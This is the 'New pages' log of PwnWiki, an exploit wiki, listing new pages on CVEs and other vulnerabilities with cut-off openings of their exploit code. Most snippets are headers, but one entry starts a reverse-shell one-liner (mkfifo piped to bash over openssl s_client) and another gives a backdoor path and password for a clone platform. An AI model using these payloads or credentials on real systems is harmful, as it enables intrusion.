New pages
From PwnWiki
(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)
- 13:09, 5 May 2021 CVE-2021-21220 Google Chrome XOR Typer 越權訪問/遠程代碼執行漏洞 (hist | edit) [5,735 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule...")
- 12:42, 5 May 2021 CVE-2021-25328 Shenzhen Skyworth (深圳創維)RN510緩衝區溢出漏洞 (hist | edit) [1,147 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> curl -i -s -k -X $'POST' \ -H $'Host: device_IP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/htm...")
- 16:30, 4 May 2021 Internship Portal Management System 1.0 未經身份驗證文件上傳&任意代碼執行漏洞 (hist | edit) [2,313 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argeneste...")
- 11:31, 4 May 2021 CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/en (hist | edit) [25,553 bytes] Pwnwiki (talk | contribs) (Created page with "<code>vsock_stream_connect()</code> contains a socket lock, and <code>vsock_stream_setsockopt()</code> in the parallel thread also tries to obtain it, which constitutes a cond...")
- 11:21, 4 May 2021 CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞 (hist | edit) [25,522 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==脆弱點== </translate> <translate> 這些漏洞是由<code>net/vmw_vsock/af_vsock.c</code>中的錯誤鎖定引起的條件競爭。這些條...")
- 11:08, 4 May 2021 CVE-2019-18683 Linux kernel through 5.3.8 特權提升漏洞 (hist | edit) [2,408 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> →* PoC crashing the kernel using the bug in drivers/media/platform/vivid. * Turned out that this bug is exploitable. * Just for fun.: #define _GNU_SOURC...")
- 10:32, 4 May 2021 CVE-2017-15715 Apache HTTPD 換行解析漏洞 (hist | edit) [484 bytes] Pwnwiki (talk | contribs) (Created page with "==影響版本== 2.4.0~2.4.29都有可能存在該漏洞 ==漏洞利用== 上傳一個名為1.php的文件,被攔截: 600px 在1.php後面插入一...")
- 21:23, 3 May 2021 GnomeHack 本地緩衝區溢出漏洞 (hist | edit) [2,505 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* * (gnomehack) local buffer overflow. (gid=games(60)) * * Author: Cody Tubbs (loophole of hhp). * www.hhp-programming.net / [email protected] * 12/17/200...")
- 21:20, 3 May 2021 CVE-2000-0573 WU-FTPD 2.6.0 遠程命令執行漏洞 (hist | edit) [10,888 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* * (c) 2000 venglin / b0f * http://b0f.freebsd.lublin.pl * * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000) * * Idea and preliminary...")
- 21:17, 3 May 2021 CVE-2004-0362 RealSecure / Blackice - 'iss pam1.dll' 遠程溢出漏洞 (hist | edit) [7,679 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit * * Copyright (c) SST 2004 All rights reserved. * * Public version * * code by...")
- 21:16, 3 May 2021 CVE-2004-0345 Red Faction 1.20 - Server Reply 遠程緩衝區溢出漏洞 (hist | edit) [5,660 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> →by Luigi Auriemma UNIX & WIN VERSION: #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef WIN32 #include <winsock.h> #include "winerr.h"...")
- 21:15, 3 May 2021 CVE-2004-0313 PSOProxy 0.91 (Windows 2000/XP) 遠程緩衝區溢出漏洞 (hist | edit) [7,246 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* Copyright © Rosiello Security http www rosiello org ================ -== Remote Exploit for PSOProxy version v0.91 ==-- Code by: rave C...")
- 20:46, 3 May 2021 CVE-2004-2111 RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' 遠程溢出漏洞 (hist | edit) [13,863 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* *----------------------------------------------------------------------- * * Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command * Remote stack buffer overflo...")
- 20:45, 3 May 2021 CVE-2003-0963 lftp 2.6.9 遠程緩衝區溢出漏洞 (hist | edit) [11,247 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* * lftp remote stack-based overflow exploit by Li0n7 voila fr * * Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se * * Lftp ve...")
- 20:43, 3 May 2021 CVE-2003-0759 IBM DB2 - Universal Database 7.2 'db2licm' 本地溢出漏洞 (hist | edit) [2,229 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> →Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by Juan Manuel Pascual Escriba pask at uninet.edu: char sc[]= "\x...")
- 20:40, 3 May 2021 CVE-2003-0849 GNU CFEngine 2.-2.0.3 遠程緩衝區溢出漏洞 (hist | edit) [1,622 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/perl -s # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. # forking portbind shellcode port=0xb0ef(45295) by eSDee # bug discover...")
- 20:39, 3 May 2021 OpenBSD - 'ibcs2 exec' 內核代碼執行漏洞 (hist | edit) [8,519 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> // // Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch // #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdi...")
- 20:38, 3 May 2021 CVE-2003-0783 hztty 2.0 (RedHat 9.0) 本地特權提升漏洞 (hist | edit) [1,410 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* 0x333hztty => hztty 2.0 local root exploit * * * more info : Debian Security Advisory DSA 385-1 * * *note* I adjusted some part of hztty's code since *...")
- 20:37, 3 May 2021 CVE-2003-0755 GtkFtpd 1.0.4 遠程緩衝區溢出漏洞 (hist | edit) [13,916 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /********************************************************** * [ gtkftpd[v1.0.4(and below)]: remote root buffer overflow exploit. ] * * by: vade79/v9 v9 at fa...")
- 20:36, 3 May 2021 CVE-2003-0725 Real Server 7/8/9 (Windows / Linux) 遠程代碼執行漏洞 (hist | edit) [7,446 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /*************************************************************** /* THCREALbad 0.4 - Wind0wZ & Linux remote root exploit /* Exploit by: Johnny Cyberpunk thehack...")
- 20:35, 3 May 2021 MiniSQL (mSQL) 1.3 - GID 遠程代碼執行漏洞 (hist | edit) [14,320 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* _ ________ _____ ______ __ ___ ____ /____.------` /_______.------.___.----` ___/____ _______...")
- 20:34, 3 May 2021 CVE-2003-0213 PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' 遠程代碼執行漏洞 (hist | edit) [10,289 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* * Fixed Exploit against PoPToP in Linux (poptop-sane.c) * ./r4nc0rwh0r3 of blightninjas ([email protected]) * * blightninjas: bringing pain, suffe...")
- 20:33, 3 May 2021 Xeneo Web Server 2.2.9.0 拒絕服務漏洞 (hist | edit) [1,460 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/perl # Xeneo Web Server DoS # # Vulnerable systems: # Xeneo. Web Server 2.2.9.0 # # Written by badpack3t <[email protected]> # For SP R...")
- 20:30, 3 May 2021 Chindi Server 1.0 拒絕服務漏洞 (hist | edit) [1,725 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /*************************************************** * Chindi server 1.0 Denial of Service * Proof of Concept by Luca Ercoli luca.ercoli at inwind.it * After D...")
- 20:29, 3 May 2021 CVE-2003-0127 Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' 權限提升漏洞 (hist | edit) [3,798 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* * Linux kernel ptrace/kmod local root exploit * * This code exploits a race condition in kernel/kmod.c, which creates * kernel thread in insecure manner....")
- 20:28, 3 May 2021 CVE-2003-1055 Sun SUNWlldap Library Hostname 本地緩衝區溢出漏洞 (hist | edit) [2,846 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /*********************************************************** * hoagie_solarisldap.c * * gcc hoagie_solarisldap.c -o hoagie_solarisldap * * Author: Andi <andi@voi...")
- 20:28, 3 May 2021 CVE-2003-0003 Microsoft Windows 2000/NT 4 - RPC Locator Service 遠程溢出漏洞 (hist | edit) [7,766 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /**************************************************************************** rpcexp.c RPC LOCATOR Exploit Autor: Marcin Wolak mail: [email protected] Last update:...")
- 20:27, 3 May 2021 CVE-2006-2667 WordPress Core 2.0.2 - 'cache' 遠程shell注入漏洞 (hist | edit) [14,837 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/php -q -d short_open_tag=on <? echo "--------------------------------------------------------------------\r\n"; echo "| WordPress <= 2.0.2 'cache' she...")
- 20:26, 3 May 2021 CVE-2003-1118 SETI@home Clients 遠程緩衝區溢出漏洞 (hist | edit) [6,386 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* Seti@Home exploit by zillion[at]safemode.org (2003/01/07) Credits for the vulnerability go to: SkyLined <[email protected]> http://spoor12.ed...")
- 20:25, 3 May 2021 CVE-2003-0201 Samba 小於 2.2.8 (Linux/BSD) 遠程命令執行漏洞 (hist | edit) [43,974 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /* Remote root exploit for Samba 2.2.x and prior that works against Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3...")
- 20:23, 3 May 2021 CVE-2003-0132 Apache 2.0.44 (Linux) 拒絕服務漏洞 (hist | edit) [2,238 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> /******** th-apachedos.c ******************************************************** * * * Remote Apache DoS exploit * * ------------------------- * * Written as a...")
- 20:22, 3 May 2021 CVE-2003-0109 Microsoft IIS - WebDAV 'ntdll.dll' 遠程緩衝區溢出漏洞 (hist | edit) [7,076 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> →*****************************************************************: →[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]: /* --------------------------...")
- 20:16, 3 May 2021 GitLab Community Edition (CE) 13.10.3 用戶枚舉漏洞 (hist | edit) [2,938 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Home...")
- 20:15, 3 May 2021 GitLab Community Edition (CE) 13.10.3 - 'Sign Up' 用戶枚舉漏洞 (hist | edit) [4,065 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # V...")
- 20:14, 3 May 2021 CVE-2021-27973 Piwigo 11.3.0 - 'language' SQL注入漏洞 (hist | edit) [1,626 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Piwigo 11.3.0 - 'language' SQL # Author: @nu11secur1ty # Testing and Debugging: nu11secur1ty # Date: 04.30.2021 # Vendor: https://piwigo.org/ #...")
- 20:12, 3 May 2021 Voting System 1.0 - Time based SQLI 未經身份驗證SQL注入漏洞 (hist | edit) [4,214 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) # Date: 02/05/2021 # Exploit Author: Syed Sheeraz Ali # Vendor Homepage: ht...")
- 20:11, 3 May 2021 GetSimple CMS Custom JS 0.1 XSS&CSRF&RCE漏洞 (hist | edit) [8,136 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE # Exploit Author: Bobby Cooke (boku) & Abhishek Joshi # Date: 30/04/201 # Vendor Homepage: http...")
- 21:13, 2 May 2021 高仿轉轉平臺(轉轉閒魚)後門 (hist | edit) [62 bytes] Pwnwiki (talk | contribs) (Created page with "==Backdoor== <pre> /detail88/index.php </pre> ==Password== id")
- 21:08, 2 May 2021 魅思CMS(MSVOD視頻系統 V10) SQL注入漏洞 (hist | edit) [576 bytes] Pwnwiki (talk | contribs) (Created page with "{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | valign="middle" |...")
- 18:55, 2 May 2021 小魚易連視頻會議系統命令注入漏洞 (hist | edit) [224 bytes] Pwnwiki (talk | contribs) (Created page with "==描述== 特徵發現:匹配規則base64編碼 解碼特徵(存在反彈shell) ==Payload== <pre> mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -con...")
- 13:09, 2 May 2021 GattLib 0.2 緩衝區溢出漏洞 (hist | edit) [1,526 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> Exploit Title: stack-based overflow # Date: 2019-11-21 # Exploit Author: Dhiraj Mishra # Vendor Homepage: http://labapart.com/ # Software Link: https://github.co...")
- 13:08, 2 May 2021 Echo Mirage 3.1 緩衝區溢出漏洞 (hist | edit) [815 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/python # Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow) # Date: 21-01-2019 # Software Link: https://sourceforge.net/projects/ech...")
- 13:08, 2 May 2021 Newsbull Haber Script 1.0.0 - 'search' SQL注入漏洞 (hist | edit) [3,905 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #################################################################### # Exploit Title: Newsbull Haber Script - SQL Injection (Time Based) # Dork: N/A # Date: 28-...")
- 13:05, 2 May 2021 CMSsite 1.0 - 'post' SQL注入漏洞 (hist | edit) [684 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: CMSsite 1.0 - 'post' SQL Injection # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 17, 2...")
- 13:04, 2 May 2021 CVE-2019-8404 Webiness Inventory 2.3 - 'ProductModel' 任意文件上傳漏洞 (hist | edit) [1,265 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> =========================================================================================== # Exploit Title: Webiness Inventory 2.3 - 'ProductModel' Arbitrary Fi...")
- 13:04, 2 May 2021 Valentina Studio 9.0.5 Linux - 'Host' 緩衝區溢出漏洞 (hist | edit) [824 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # -*- coding: utf-8 -*- # Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC) # Date: 20/02/2019 # Author: Alejandra Sánchez # Vendor Hom...")
- 13:03, 2 May 2021 Virtual VCR Max .0a - '.vcr' 緩衝區溢出漏洞 (hist | edit) [2,845 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/python # Exploit Title: VirtualVCR-Max .0a Overflow PoC # Google Dork: N/A # Date: 21/02/2019 # Exploit Author: Wade Guest # Vendor Homepage: http://...")
- 13:03, 2 May 2021 RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' SEH緩衝區溢出漏洞 (hist | edit) [2,469 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) # Date: 21.02.2019 # Exploit Author: Matteo Malvica # Vendor Homepage:...")
- 13:01, 2 May 2021 Advanced Host Monitor 11.92 beta 本地緩衝區溢出漏洞 (hist | edit) [7,973 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/env python #------------------------------------------------------------------------------------------------------------------------------------# # E...")
- 13:01, 2 May 2021 CVE-2019-9647 Gila CMS 1.9.1 XSS漏洞 (hist | edit) [564 bytes] Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Gila CMS (search) Cross Site Scripting # Google Dork: intext:"Powered By Gila CMS" # Date: 11.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Ven...")